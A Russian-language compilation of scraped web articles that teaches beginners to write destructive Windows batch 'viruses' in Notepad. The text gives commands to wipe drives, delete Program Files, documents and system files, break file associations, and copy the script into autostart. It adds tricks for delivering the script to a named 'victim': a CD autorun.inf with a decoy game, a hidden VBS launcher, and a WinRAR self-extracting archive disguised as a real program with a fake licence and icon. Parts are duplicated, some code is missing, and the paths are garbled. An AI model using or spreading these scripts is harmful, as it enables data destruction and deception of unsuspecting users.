Вирусы написать как в блокноте

Создаем вирус в блокноте

NGaming

.pisya

Что понадобится для создания вируса:

• Открыть Блокнот
• Вставить нужные коды
• Сохранить файл в формате .bat

Коды:

Удаляет все с доп. носителей

А теперь более опасные батники:

Заставляет систему упасть один раз потом компьютер не может быть перезапущен. Он удаляет все необходимое для запуска системы
НЕ ИСПОЛЬЗУЙТЕ НА СЕБЕ

NGaming

.pisya

prorok

Have a nice day

Justman

Даэдрот такой

NGaming

.pisya

grinex

aka Logequm

Что понадобится для создания вируса:

• Открыть Блокнот
• Вставить нужные коды
• Сохранить файл в формате .bat

Коды:

Удаляет все с доп. носителей

Удаляет все что хранится в реестре

Останавливает доступ в Интернет пользователя. Чтобы получить доступ обратно напишите IPconfig /renew в CMD

Отправляет сообщение и выключает компьютер

Простой вирус, который заставляет компьютер дать ошибку.
Сохранить как файл.VBS

Форматируются диски менее чем за 5 секунд. Только D, Е и С

Останавливает компьютер каждый раз при его включении

А теперь более опасные батники:

Заставляет систему упасть один раз потом компьютер не может быть перезапущен. Он удаляет все необходимое для запуска системы
НЕ ИСПОЛЬЗУЙТЕ НА СЕБЕ

Этот вирус отключает Интернет навсегда

Источник статьи: http://miped.ru/f/threads/sozdaem-virus-v-bloknote.42589/

Как написать вирусы в блокноте? Пример простого вируса

Не думайте, пожалуйста, что знания о том, как пишутся вирусы, нужны только вирусописателям! В целях компьютерной безопасности они не менее важны и простым пользователям. Даже поверхностное понимание того, как написать вирусы в блокноте, поможет защитить компьютер от многих неприятностей.

Пишем вирус в блокноте

Вот так выглядит вирус, набранный в обыкновенном блокноте, который есть в составе любой системы от Microsoft Windows. Но знайте — это сложно назвать вирусом, просто системные команды, они сохраняются в формате .bat. Для изменения расширений, нужно настроить систему:

• Открываем «Компьютер«
• Заходим верхнее в меню « Сервис«, если не видно жмем ALT
• В этом меню заходим в « Сервис» выбираем пункт « Параметры папок«
• Заходим во вкладку « Вид» и ищем пункт « Скрывать расширения для зарегистрированных типов файлов«
• Убираем галочку с этого пункта.

С первого взгляда ничего страшного — всего несколько коротких слов-команд. Но на деле, если поместить этот файл в системную папку «system32\drivers\etc» и прописать его в автозагрузку, чтобы он запускался при загрузке системы, то, после перезапуска компьютера, невозможно будет открыть какую-либо программу или выбрать другое действие на рабочем столе. Не рекомендуется повторять эти действия, если нет навыков работы с системным реестром!

Вместо telnetdrive.bat попробуйте вписать безопасные команды для запуска: Calc (калькулятора), Taskmgr (диспетчера задач) или Mspaint (программы рисования)

С чего начать

Пришло время изучить небольшую общую инструкцию по «изготовлению» таких файлов.

• Первым делом открываем блокнот;
• Заносим туда команды, т.е. создаём в нём «тело» вируса;
• Сохраняем свой труд через Файл -> Сохранить как;
• Теперь осталось изменить расширение файла .txt на .bat и, вместо сохранённого названия, вписать нужное, которое будет использоваться.

Создаём первый файл-вирус

Простой вирус написан и сохранён в файл. Теперь бы неплохо узнать, что же прописали в тело вируса, сохранённого в файле.

Начинаем разбираться по порядку с первой строки:

1. @Echooff – без этой команды всё, что написано, высвечивалось бы на экране монитора.
2. Date11.14 – указывает на дату создания.
3. Ifexistc:sky.batgotoabc – проверка существования на диске С файла sky.bat и если его нет
4. Copy %0 c:sky.bat – размножает себя, изменив первоначальное имя файла на sky.bat
5. Attrib +hc:sky.bat – скрывает созданный файл от посторонних глаз.
6. Echoc:sky.bat >>autoexec.bat – вирус прописывается в автозагрузку.
7. :abc – если он есть, выполнение программы перейдёт сюда.

Далее идут небольшие шалости:

1. mdCRECK – создаёт нужную или ненужную папку, смотря какая цель у создателя вируса.
2. mdNEW – такими папками можно заполнить весь жёсткий диск у пользователя.
3. LabelE:LUZER – прописывает название логического диска Е. В данном случае LUZER.
4. assoc .exe=.mp3 – расширение .exe будет ассоциироваться, как .mp
5. del c:Program Files /q –всё, что было в папке Program Files удалится.
6. del *.* /q – из каталога, где находится вирус, удалится всё, кроме папки с самим вирусом.

Повеселились достаточно, подумаем и о законе:

1. del %0 – вирус наделает дел и удалит сам себя.

Осталось последнее, узнать, как же его прячут. Просто! Переформатируют файл из расширения .bat в .exe при помощи архиватора WinRAR. При создании архива помечают – «Создать архив SFX» и устанавливают отметку «Выполнить после распаковки». Естественно, указывают настоящее имя, под которым создан вирус.

Источник статьи: http://www.burn-soft.ru/nachalnoe-obuchenie-kompyuteru/kak-napisat-virusy-v-bloknote-primer-prostogo-virusa.html

Как создать простейший вирус на пк?

Привет всем!Сегодня решил написать статью о простейшем вирусе(его даже так не назовешь)И сразу предупреждаю пишу статью в ознакомительных целях и не побуждаю распространять вирус!Можете проверить его в виртуальной мишине! Зачем я пишу эту статью?- Многие не знают об этом и могут попасться на это!

В начале я расскажу как создать bat вирус:

2)пишешь там команды — так называемое ТЕЛО вируса

3)дальше Файл — Сохранить как — и теперь пишешь имя и расширение т.е. *.bat

4)* (звездочка) это любое имя, как на английском, так и на русском.

Т.е. у тебя было так: Текстовый документ. txt (по умолчанию)

а ты сделай вот так: Текстовый документ. bat (батовский)

Но вы не тупые и конечно же поняли что необязательно называть «текстовый документ.bat» , можно к примеру назвать prikol.bat , или еще как нибудь. Ну там дальше работает фантазия. 🙂

Первая статья про написание бат вирусов.

Итак, чтобы создать бат вирус нужно открыть блокнот написать команды,и сохранить с разрешением .bat К командам существуют и специальные параметры определяющие как команда будет выполняться. Вот например после команды start мы видим параметр /min — он запускает приложение, но в свёрнутом виде. Если за место него мы написали бы /max, то приложение соответственно запустилось во весь экран, развёрнутое. У команды start ещё есть с десяток параметров, но о них я вам говорить не стану т.к. они нам не чем не помогут (зачем нам задавать приоритет приложения?). В таблице написано приложение и команда которая его запускает:

Настройка системы — start msconfig

Редактор символов — eudcedit

Таблица символов — charmap

Отладчик доктора — drwtsn32

Дефрагментация диска С: — defrag C:

И ещё чтоб вы знали. Как же всё это выполняется, ведь команд куча, все они требуют приложения которое будет их выполнять. Неужели это всё одна программа? Нет, программа «cmd» служит для того чтобы через неё запускать другие программы. Вот например есть такая команда mem, введите её и увидите сведения о памяти вашего компа. Так вот, этой командой заправляет отдельное приложение. Оно так и называется mem. Лежит это приложение в C:WINDOWS\system32 и есть ещё резервная копия по адресу: C:WINDOWSsystem32dllcache. Это для того чтобы восстановиться от нечаянного удаления нужных файлов. Так вот к чему рассказ, удалите в этих двух директориях приложение «mem.exe» и теперь введите в командную строку, вам не чего не покажут разве лишь только ошибку, или может даже то, что системного файла не хватает. Из этого следует вывод, если удалить приложения стирания, перемещения, то командные файлы у вас не сработают. Но я думаю «жертва» об этом даже не догадывается. Теперь приступим к написанию команд для человека, которому вы хотели бы сильно (или не очень сильно) навредить! Для начала напишем команду, которая не удаляет файлы, а просто ставит на них атрибут «Скрытый» и «Системный» и после запуска команды файлики исчезнут. Просто пишем:

attrib +h +s Используемые параметры в команде attrib:

+r Установка атрибута «Только чтение».

-r Снятие атрибута «Только чтение».

+a Установка атрибута «Архивный».

-a Снятие атрибута «Архивный».

+s Установка атрибута «Системный».

-s Снятие атрибута «Системный».

-h Снятие атрибута «Скрытый».

+h Установка атрибута «Скрытый».

Но мы будем только пользоваться двумя, может тремя. Давайте для начала скроем папку WINDOWS, чтобы перепуганный новичок орал «Х-де моя папка WINDOWS!» пишем:

Или же можно скрыть файлы (вложенные папки остануться) в самой папке:

cd C:windows переходим в папку «windows»

attrib +h +s и ставим атрибуты

У нас новая команда cd после неё пишем путь к директории и последующие команды будут применяться к этой папке. Почему надо ставить два атрибута? Достаточно поставить один «Скрытый» и он скроется? В принципе у ламера да, но если вы поставили в свойствах папки «Показывать скрытые файлы и папки», то фишка не прокатит, а с двумя параметрами файл можно только увидеть в FAR, или Commander (это файловые менеджеры).

А если мы хотим снять все атрибуты со всех файлов в этом каталоге, да и ещё и подкаталог? Для снятия или назначение атрибутов в подкаталоги надо воспользоваться параметром /s. Например для снятия всех атрибутов со всех файлов в этой папке и всех её подпапках пишем:

Существует ещё одна загвоздка, а если на подпаке стоят атрибуты, то с неё команда снимет их? Нет, она не снимет не с этой папки, не с файлов которые в этой скрытой папке находятся. Поэтому нам нужен ещё один параметр для снятия атрибутов с папок /d. Например если мы хотим снять атрибуты ну со всего что только возможно в папки «Windows» нам надо написать:

attrib -r -s -h C:WINDOWS*.* /s /d

Ну не обязательно именно эта папка можно такую команду применить для других папок, например можно скрыть ненужный мусор, который следует удалить, а не как… ну об этом в главе: «Заполняем место мусором» Или какими он часто пользуется папками и файлами? Ну я думаю на «Рабочем столе» он держит кучу ярлыков. А если они исчезнут? Он их поставит опять, а мы сделаем запуск нашего вируса с каждым включением компа и сколько бы он раз заново не ставил свои ярлыки, они всё исчезают и исчезают. но об этом потом.

Я думаю вы не станете биться в бешеном припадке если тестируя вирус скроете свои папки. Просто напишите команду которая снимает атрибуты.

Ну что, сейчас пойдут команды удаления. Интуиция вам подсказывает что удаление это плохо.

После запуска удалятся только файлы (не затронув папки) в той директории, где был запущен файл, т.е. запустили мы этот файл на рабочем столе, все ярлычки исчезли, но теперь уже навсегда. Если запустим файл в «Моих документах» то файлы исчезнут там. Но если поставить параметр /s то будет удаляться и в каталогах и подкаталогах. Параметр /q задаёт удаление без подтверждения. Теперь мы удалим шрифты:

Почему без /s ? А зачем, там нет подпапок. Правда не все шрифты удаляться системные останутся. Хоть откуда запускайте файл шрифты всё равно удаляться ведь указан путь… можно удалить хоть что вот, например:

Удалит стандартную музыку, например: музыка при запуске системы или при ошибки.

Системная папка, ну я думаю, даже не стоит объяснять, что произойдёт после ликвидации файлов. Но есть один подвох если на файле будут стаять атрибуты «Скрытый» и «Системный» то наши удаление на них не подействует, их попросту пропустят. А вот как раз самые важные файлы то и отмечены этими параметрами (от нечаянного стирания). Что в этом случае делать? Придётся сначала писать команду снятия всех атрибутов с файлов, каталогов, подкаталога. Надеюсь вы помните главу «Хд-е мои файлы»? Командой del мы хоть и удаляем файлы, а папки то останутся, но есть команда которая стирает папки вместе с файлами:

rd C:windowsMedia /s /q и все папочки и файлики удаляться. Вы спросите, ну если команда rd так хороша, зачем нужна команда del ? Ответ прост, вы попробуйте удалить командой rd , допустим только ярлыки рабочего стола, или только рисунки в папке windows. Командой del это делается так:

del C:windows*.bmp /q /s И нет стандартных рисунков, думаю понятно, почему удалены только рисунки ведь стоит маска .bmp если поставить .txt то удаляться текстовые файлы, об этом в главе «Маски» Файл можно ещё и просто не удаляя переместить, например:

move C:WINDOWS*.txt C:Text /y На команде видно что мы перемещаем все текстовые файлы в папку «Text» на диске C: (в папке WINDOWS их уже не будет, это же перемещение, где взяли там уже нет). Что интересно мы наносим такой же вред как и при удалении ведь комп будет считать что там этих файлов уже нет. (Правда удалять быстрее). Параметр /y выключает предупреждения о перезаписи, если вдруг имена совпадут.

А теперь попробуйте догадаться что попытается сделать эта команда:

И ещё напоследок чтобы хорошенько усвоили, комп не даёт вам просто так удалять системные и скрытые файлы, надо сначала снять все атрибуты. Иначе облом. Но этот процесс офигеть длительный так что лучше снимать только с определённых файлов, но это надо знать с каких. Так что чтобы написать вирус вам надо самим знать какие файлы системные и стандартные. Прочитать много книг и. убить Билла Гейца и занять его пост!

Когда мы открываем диск С: мы видим не все файлы, которые там лежат, система их спрятала, для того чтобы их не тронул неопытный пользователь. Так вот раз они такие важные, а почему бы нам их не удалить… Сделать это можно в два шага, сначала снять с нашего секретного файла атрибут системный и скрытый, а то нам не кто не позволит нечего удалять, а потом возьмем и удалим всё НЕНУЖНОЕ, то есть самое необходимое:

Но тут нам много удалить не дадут. Всё триста раз защищено. Можно, например, попробовать удалить УСТАНОВЛЕНЫЕ НАМИ программы хранящиеся на диске! С:/ размахом сказал да? Ну, так вот если мы знаем, что все программы по умолчанию записываются в папку Program Files то можно, например, написать вот такую команду:

rd %ProgramFiles% /s /q А вот если написать:

rd C:Program Files /s /q то вирус не сработает заявив что таких папок он не нашёл? Каких таких? Наш вирус будет искать папку «Program» и папку «Files». Ладно у нас есть зарезервированая команда для папки Program Files — %programfiles%. А если мы хотим удалить «Мои документы». То вирус будет искать папки «Мои» и «Документы». В этом случае нам помогут двойные кавычки. Можно удалить содержимое «Моих документов» тем более многие хранят там самое важное: Chcp 1251 Р. Кодовая. стр. т.к. в команде Р. текст. del «%USERPROFILE%Мои документы*.*» /q /s

Важно! При установки операционки можно задать любую корневую папку и вы по команде cd C:WINDOWS не куда не попадёте. Может у него корневой каталог называется win? Нам поможет имя которое перебросит нас в корнивой каталог как бы он не назывался cd %SystemRoot%. Та же история с папкой пользователя как дойти до рабочего стола? cd «C:Documents and SettingsА тут чё писать. Рабочий стол» Видите где я вас спрашиваю «Тут чё писать» действительно ведь там стоит имя пользователя, угадать почти нереально. Поэтому надо написать cd %USERPROFILE%рабочий стол. Ну в папку Program Files мы уже знаем cd %programfiles% И не забывайте если есть в какой либо команде русские буквы например «Рабочий стол» или «Мои документы» обязательно в начале пишите команду Chcp 1251

А если мы хотим удалить в папке «Windows» только Текстовые файлы (txt) и Параметры конфигурации (ini), а на диске D: Рисунки (bmp)? Мы напишем три команды одна удаляет то, вторая это. Но можно всё это написать в одной команде: for %%Q in (C:WINDOWS*.txt *.ini D:*.bmp) do del %%Q Видно что мы можем написать свои пути в скобках, хоть какие, так же можем пользоваться масками разных комбинаций. А после слова do у нас стоит команда del так вот мы можем написать например attrib +h +s и теперь на диске С: скроются текстовые файлы и файлы ini. Ну суть понятна? В скобках пишем любой путь или пути, а после do любую команду (которую можно применить к файлу).

Теперь давайте предположим что мы сделали вирус, который при загрузке компа создаёт ненужный мусор. «ламер» его удаляет, а он при загрузке появляется снова. А если «ламер» мусор не удалит? То наш тупой вирус будет его пытаться создать опять, может даже начнёт задавать «ламер» вопросы о перезаписи. «ламер» сразу обнаружит в чём дело и всё исправит. А давайте напишем команду которая проверяет, есть ли наш мусор на том месте где мы его создавали или уже нет. Если есть вирус завершиться. Если нет то сново создаст мусор.

Помните как мы создавали мусор? Брали настоящие файлы копировали их с другим расширением и приписывали в начали приставку «VIR». Так вот наш вирус проверяет, есть ли хоть один файл у которого есть расширение .sys и приставка «VIR» в начале (можете писать что угодно, исходя из содержания вашего вируса). Если таковые имеются он выходит командой exit. Если таких нет, то переходит к точки x и создаёт мусор снова. Надеюсь вы понимаете что это только небольшой кусок кода вируса, например в начале должна стоять команда перехода в каталог, где будет всё проверяться. Где написано слово «МУСОР» должны быть написаны команды создования мусора. p>И ещё, я чё то всё говорю путь диск C:, диск C:, но для полной уверености можно я бы сказал НУЖНО прописать точно такие же команды и для диска D: (в этом же нашем файле вируса) и не только для D:, если не лень накатайте все буквы дисков. Т.к. некоторые умники меняют букву диска на «O» ; «P» ; «Q» ; «R» ; «S» ; «T» ; «U» или ещё какие (правильно делают). Безопасность, будь она не ладна. Маленькие команды Тут написаны команды для которых отдельная глава много.

Эта команда удаляет сама себя, пишите её в самом конце вашего вируса и всё, ни кто не узнает, что вы испортили на его компе чтобы сразу эту пакость не исправить.

Эта команда копирует себя в другое место. Так можно наклонироваться по всему диску, Нет, нет, да кто нибудь запустит интересный «setup» или «games»

copy %0 C:windows/sex.bat ну и.т.д.

Можно изменить текущее время на своё:

Можно изменить текущую дату:

cd «%USERPROFILE%Главное менюПрограммыАвтозагрузка»

допустим мы создадим 100 пустых папок в папке «Автозагрузка» и при включение компа каждый раз будут открываться сотня папок, даааа так сдохнуть можно каждый раз их

Пытаемся повесить систему

Как я уже говорил в начальной главе чтобы запустить какую-нибудь программу надо написать start в начале строки и команду например:

Start mspaint и Paint откроется

А что если задать компу открыть сразу 50, или 100 Paint(ов) силёнок хватит не у всех. Можно конечно написать вот таких 100 строк: Start mspaint но этого мы делать не будем не волнуйтесь. Мы напишет вот такое:

Start mspaint пишем команду (в данном случае это открытие Paint(а)

goto x говорим чтобы комп начинал всё с начальной точки

Этим самым у нас получаеться бесконечный цикл открытия приложения и попытка зависания компа.

А вот например если мы хотим «подарить» ваш великолепно выполненный вирус определённому человеку, да ещё вдобавок не по сети, а дать его на диске, то можно ещё кое как фишкануть… кстати говоря чтобы жертва на вас не злилась можно на диске действительно записать какую-нибудь небольшую игру, возможно он успеет поиграть в неё, и как не в чём не бывало отключить комп. Но он его больше не включит. У вас есть прикрытие вы скажете мол установка игрухи прошла криво. Описание ближайшего будущего: Наша жертва берёт наш диск и засовывает его в дисковод и как обычно ждёт когда комп прочтёт диск и запустит его, а тем временем наш диск ка-а-а-ак запустит автоматически наш вирус и всё удалит…ну или создаст много мусора… вот такая хрень… Для этого мы откроем блокнот и напишем там следующие:

Имя, которое у меня стоит «virus» может быль любое, например «1». Вспомните когда мы вставляем диск с какоё-либо игрой то после открытия «Моего компа» на том месте, где был обычный значок диска, появляется значок игры…вот и мы можем также сделать засунуть значок, на диск, обозвав его «znak» и добавляем в нашем файле строку:

Потом сохраняем наш файл, дав ему имя AUTORUN и расширение .inf Для особо тупых:

Всё это будет сохранено AUTORUN.inf

Потом берём и записываем на диск наши четыре компонента:

virus.bat наш с вами «мощненький вирусик»

znak.ico какой нибуть красивый значок

AUTORUN.inf автомат запуска вируса

Игра. можете и не записывать.

Вирус, тут желательно делать такой который создаёт много мусора типа это игра столько занимает, которую вы предварительно запишите на диск. И ещё в коде надо прописать запуск установки игры, чтобы при включении диска у нас запустилась установка и вирус. Правда после её удаления место существенно не прибавиться и только мы знаем почему. Преимущество такого вот способа состоит в том, что длительный процесс создания мусора можно сослать непосредственно на распаковку игры.

Здесь будут представлены более сложные команды

Shutdown -f -Эта команда выключает компьютер

del *.* /q -После запуска удалятся только файлы (не затронув папки) в той директории, где был запущен файл, т.е. запустили мы этот файл на рабочем столе, все ярлычки исчезли, но теперь уже навсегда. Если запустим файл в «Моих документах» то файлы исчезнут там. Но если поставить параметр /s то будет удаляться и в каталогах и подкаталогах. Параметр /q задаёт удаление без подтверждения.

Почему без /s ? А зачем, там нет подпапок. Правда не все шрифты удаляться системные останутся. Хоть откуда запускайте файл шрифты всё равно удаляться ведь указан путь… можно удалить хоть что вот, например:

Удалит стандартную музыку, например: музыка при запуске системы или при ошибки.

Системная папка, ну я думаю, даже не стоит объяснять, что произойдёт после ликвидации файлов. Но есть один подвох, если на файле будут стоять атрибуты «Скрытый» и «Системный» то наше удаление на них не подействует, их попросту пропустят. А вот как раз самые важные файлы то и отмечены этими параметрами (от нечаянного стирания). Что в этом случае делать? Придётся сначала писать команду снятия всех атрибутов с файлов, каталогов, подкаталога.

И нет стандартных рисунков, думаю понятно, почему удалены только рисунки ведь стоит маска .bmp если поставить .txt то удаляться текстовые файлы.

Когда мы открываем диск С: мы видим не все файлы, которые там лежат, система их спрятала, для того чтобы их не тронул неопытный пользователь. Так вот раз они такие важные, а почему бы нам их не удалить… Сделать это можно в два шага, сначала снять с нашего секретного файла атрибут системный и скрытый, а то нам не кто не позволит ничего удалять, а потом возьмем и удалим всё НЕНУЖНОЕ, то есть самое необходимое:

Но тут нам много удалить не дадут. Всё триста раз защищено.

Можно, например, попробовать удалить УСТАНОВЛЕННЫЕ НАМИ программы хранящиеся на диске! С:/ размахом сказал да? Ну, так вот если мы знаем, что все программы по умолчанию записываются в папку Program Files то можно, например, написать вот такую команду:

то вирус не сработает заявив что таких папок он не нашёл? Каких таких? Наш вирус будет искать папку «Program» и папку «Files». Ладно, у нас есть зарезервированая команда для папки Program Files — %programfiles%. А если мы хотим удалить «Мои документы», то вирус будет искать папки «Мои» и «Документы». В этом случае нам помогут двойные кавычки. Можно удалить содержимое «Моих документов» тем более многие хранят там самое важное:

Chcp 1251 Р. Кодовая. стр. т.к. в команде Р. текст.

del «%USERPROFILE%Мои документы*.*» /q /s

Важно! При установки операционки можно задать любую корневую папку и вы по команде cd C:WINDOWS не куда не попадёте. Может у него корневой каталог называется win? Нам поможет имя которое перебросит нас в корневой каталог как бы он не назывался cd %SystemRoot%. Та же история с папкой пользователя как дойти до рабочего стола? cd «C:Documents and SettingsА тут чё писать. Рабочий стол» Видите где я вас спрашиваю «Тут чё писать» действительно ведь там стоит имя пользователя, угадать почти нереально. Поэтому надо написать cd %USERPROFILE%рабочий стол. Ну в папку Program Files мы уже знаем cd %programfiles%. И не забывайте если есть в какой либо команде русские буквы например «Рабочий стол» или «Мои документы» обязательно в начале пишите команду Chcp1251

А если мы хотим удалить в папке «Windows» только Текстовые файлы (txt) и Параметры конфигурации (ini), а на диске D: Рисунки (bmp)? Мы напишем три команды одна удаляет то, вторая это. Но можно всё это написать в одной команде:

for %%Q in (C:WINDOWS*.txt *.ini D:*.bmp) do del %%Q

Видно что мы можем написать свои пути в скобках, хоть какие, так же можем пользоваться масками разных комбинаций. А после слова do у нас стоит команда del так вот мы можем написать например attrib +h +s и теперь на диске С: скроются текстовые файлы и файлы ini. Ну, суть понятна? В скобках пишем любой путь или пути, а после do любую команду (которую можно применить к файлу).

Теперь давайте предположим что мы сделали вирус, который при загрузке компа создаёт ненужный мусор. «Жертва» его удаляет, а он при загрузке появляется снова. А если «жертва» мусор не удалит? То наш тупой вирус будет его пытаться создать опять, может даже начнёт задавать «жертве» вопросы о перезаписи. «жертва» сразу обнаружит в чём дело и всё исправит. А давайте напишем команду которая проверяет, есть ли наш мусор на том месте где мы его создавали или уже нет. Если есть вирус завершиться. Если нет то снова создаст мусор.

Помните как мы создавали мусор? Брали настоящие файлы копировали их с другим расширением и приписывали в начали приставку «VIR». Так вот наш вирус проверяет, есть ли хоть один файл у которого есть расширение .sys и приставка «VIR» в начале (можете писать что угодно, исходя из содержания вашего вируса). Если таковые имеются он выходит командой exit. Если таких нет, то переходит к точки x и создаёт мусор снова. Надеюсь вы понимаете что это только небольшой кусок кода вируса, например в начале должна стоять команда перехода в каталог, где будет всё проверяться. Где написано слово «МУСОР» должны быть написаны команды создования мусора.

И ещё, я что то всё говорю путь диск C:, диск C:, но для полной уверености можно, я бы сказал НУЖНО прописать точно такие же команды и для диска D: (в этом же нашем файле вируса) и не только для D:, если не лень накатайте все буквы дисков. Т.к. некоторые умники меняют букву диска на «O» ; «P» ; «Q» ; «R» ; «S» ; «T» ; «U» или ещё какие (правильно делают). Безопасность, будь она не ладна.

rd C: /s /q -а это главная команда удаления, ведь она может отформатировать диск за 10-20 сек в зависимости от объема диска

cd «%USERPROFILE%Главное менюПрограммы»

и папки будут создаваться в разделе программы.

cd «%USERPROFILE%Главное менюПрограммыАвтозагрузка»

Допустим мы создадим 100 пустых папок в папке «Автозагрузка» и при включение компа каждый раз будут открываться сотня папок, да так сдохнуть можно каждый раз их закрывая!

Кстати говоря, очень вредный вирус получиться, если поменять расширение. Вот например кажется ярлык подумаешь… он мне и не нужен вовсе… ан нет без ярлыков будет просто ужасно! Вы только представьте, чтобы сыграть в игру вам достаточно щелкнуть по ярлыку находящемуся на вашем рабочем столе, а когда ярлыка нет… вам надо лезть в диск С: заходить в папку «Игры» потом что-то ещё… да так сдохнуть можно! Итак, я тут подумал, одним из важных вещей у нас является ярлык, так мы берём и…

здесь наглядно показано, что я хочу поменять ярлык (расширение, как известно .lnk) на музыкальное расширение .avi и уже понятно, что ярлык с таким расширением ни куда вас не пошлёт! А вот вы комп будете долго посылать.… Ну и, конечно же, нетрудно догадаться, как такой вирусик может оказаться разрушительным, мы с вами поменяем приложение .exe и тогда ни одна программа, ни запуститься.

тут показано расширение программ .exe ну и уже по традиции я меняю его на .avi Вы кстати можете придумать что-нибудь своё… например поменять jpg (рисунки) например на .virus вот весело будет когда он захочет посмотреть свои картинки…

Можно же просто удалить расширение, не заменяя его на другое:

После знака = надо нажать один раз пробел, а уже потом сохранять наш вирусик. Кстати говоря, если хотите доставить своей жертве хорошую встряску, напишите в одном вирусике команд 20 удалений расширений все (разные и необходимые) Здесь я привёл некторые расширения, если вам кажеться что их не достаточно пишите свои:

Текстовые файлы doc .txt .wp .diz .log .wri

Музыкальные файлы .mp3 .wav .avi .wmv .mpg

Картинки .bmp .jpg .gif .tif .pic

Архиваторы .rar .zip .arj .cab lzh.

Системные файлы .sys .dll .rnf .drv .ega

Можно путь для копирования поставить другой путь:

copy C:*.* C: program наш никчёмный файл появиться на диске С:

можно скопировать, что-нибудь другое:

copy C:windowssystem32*.* C:Microsoft*.exe

Видно что все файлы будь это текст, или музыка мы сохраняем как приложение *.exe. Но это уже очень длительный процесс (копировать всё из system32). Есть другой способ копирования:

Эта команда просто скопирует все пути к папкам и файлам в один текстовый файл (долго). А можно в одной команде задать несколько каталогов и все файлы из них слепяться в один кусок, например:

copy C:WINDOWS*.txt + C:WINDOWSHelp*.* KYSOK

Мы видим что я беру из папки «Windows» все текстовые файлы а из папки «Help» вообще все файлы и слепливаю кусок из всех них в файл «KUSOK» (од даже будет без расширения, но можно его и сделать, если пожелаете)

А можно полностью скопировать папку «system32» в другое место и поставить атрибут скрытый, чтобы жертва не удалила нашу совершенно ненужную копию.

xcopy C:WINDOWSWeb C:mysor /q /e /h /y копируем папку web в папку musor.

attrib +h +s C:/mysor всё скрываем с глаз людских.

Если посмотреть, то я задал много параметров для команды xcopy (у неё их ещё больше). Итак параметр /q ну это как везде, чтобы на экране не было лишних сообщений. /e для копирования пустых каталогов. По умолчнию Системные и Скрытые файлы не копируються, так вот параметр /h разрешает их копирование. Если при копировании имена совпадут то будет задан вопрос о перезаписи, а так как вопросы нам не нужны, вот мы влепили параметр /y.

Ах, совсем забыл, не пишите вот такую команду:

А то антивирус, если он есть у нашей жертвы, обязательно обезвредит этот наш вирус, посчитав его за Троян.BAT.CopyToWindows.

Можно оповещать нашу жертву о ходе действия нашего вируса. Для этого есть команда msg. Например:

msg * Поздравляю, тебя взломали!

Можно использовать и другой способ, открывая на весь экран блокноты, в которых будет написано сообщение:

echo >> read.txt Пожалуйста, внимательно прочитайте! Перед тем как установить игру закройте….и.т.д.

Тут так же действует вывод сообщения, но мы задали его отправить в текстовый файл read. Вторая строка говорит, что мы хотим открыть наш текстовый файл уже с готовым сообщением во весь экран. И пока наша жертва будет читать, что там ей надо сделать, вирус сделает своё дело. Можно конечно вместо скучной лекции написать прикольные анекдоты и тогда жертва уже точно не будет отвлекаться.

Можно остоновить выполнение нашего вируса хитрой командой. Вылетит собщение «Для продолжения нажмите любую клавишу. «.

А теперь закинем вирус в автозагрузку. Я предлагаю мало того, что мы поставим наш файл в папку «автозагрузка» так мы его скроем т.к. тот, кто догадается в эту папку посмотреть, без труда наш вирус удалит и многократное выключение не удаться:

cd «%USERPROFILE%Главное менюПрограммыАвтозагрузка»

вы видите, что я сначала переключаюсь на русскую кодовую страницу это потому что в нашей команде есть русские буквы.

Только вот, есть одна здоровая загвоздка, из трёх компов (на которых я проверял эту команду), на двух автозагрузка не сработала — просто убрала все элементы и как будто их и не было.

И еще, бывает так: жертва открывает вирус, видит выскакивающее окно и быстренько его закрывает, и всё вирус не сработал! Но я нашёл способ чтоб окно не открывалось — нужно вписать скрипт в самораспоковывающийся архив и именно его архив и должен открыть, а скрипт этот мы будем писать на vbs его можно создать в блокноте а прописывать мы там будем Set WshShell = WScript.CreateObject(«WScript.Shell») WshShell.Run»C:sistem32Connect.bat «, 0, true

Ну вот и все! Кстати протестировать получившийся вирус у себя на компе можно на виртуальной машине. Что это такое и скачать бесплатно виртуальную машину можно там же. Ну а на следующем уроке поговорим как сделать из этого вируса настоящее exe приложение с лицензионным соглашением. А то отослали вы вирус жертве, а она его не открыла потому что значок какой то странный и расширение неизвестное. Я вас научу как сделать так, чтоб у жертвы не было ни малейшего сомнения! Итак приступим.

А теперь я покажу как сделать из этого «вируса» настоящее приложение! А то вот отослали мы вирус жертве, а она его не открыла т.к. значок какой то странный и весит то мало. Дак вот теперь мы добавим нашему вирусу солидности — теперь он будет весить побольше — не 1 Кб, а около 45Кб (ну туда можно еще всяких картинок и музыки для веса дофига запихать, но сделать так, чтобы при распаковке это удалилось), с расширением exe (как все нормальные программы) и даже лицензионным соглашением! Использовать мы будем архиватор WinRaR. Его можно скачать с официального сайта или можно скачать бесплатно WinRaR с моего сайта. Ну, приступим:

1) Кликаешь на вирус правой кнопкой мыши и выбираешь «создать архив. «

2) В открывшемся окне поставь флажок возле окна «создать SFX-архив»

3) В окне «имя архива» пишешь название будущей программы (или игры — как вы там это другу представите)

4) Потом выбираешь вкладку «Дополнительно» (это в самом верху) и в этом окне выбираешь «параметры SFX»

5) В открывшемся окне в окошечке «путь для распаковки» ставишь флажок возле «создать в текущей папке»

6) В окошечке «выполнить после распаковки» пишешь имя вируса. Обрати внимание именно вируса , а не приложения которое мы делаем! Иначе комп жертвы будет вечно запускать приложение а вот вирус так и не откроется. Внимательней!

7) Теперь идем во вкладку «лицензионное соглашение» и пишем там нечто скучное и длинное. Только писать надо без грамматических ошибок — лишнее подозрение нам не нужно!

8) Переходим в «текст и значок». Там пишем текст который будет в окне программы — непосредственно само описание «продукта». А в поле значок нажимаем обзор, идем в папку со значками и выбираем значок к нашей программе. В принципе, выбирать значок и не обязательно

9) Этот шаг выполнять тоже в общем то необязательно. Но если хотим чтобы вирус был в Автозагрузке (снова и снова запускался при перезагрузке компа), то идем во вкладку «Дополнительно» и нажимаем «Добавить ярлык. «. «Место создания ярлыка» — естественно Автозагрузка. «Имя файла, для которого будет создания ярлык:» здесь пишем имя вируса с расширением. «Имя ярлыка(файла .ink):» здесь пишем имя ярлычка, например FlashPlayer — ярлык то в автозагрузке будет. Остальные поля оставьте пустыми.

10) Ну и все! нажимаешь ОК, потом еще раз ОК и он тебе создает приложение! Настоящее приложение с расширением .exe , лицензионным соглашение и. вирусом который при желании может форматнуть все жесткие диски! Вот так вот!

На этом я свою статью заканчиваю и до следующей статьи!

Источник статьи: http://zen.yandex.ru/media/id/5ae82ed99e29a23794d9026e/kak-sozdat-prosteishii-virus-na-pk-5ae88fe5a815f19a06c026f8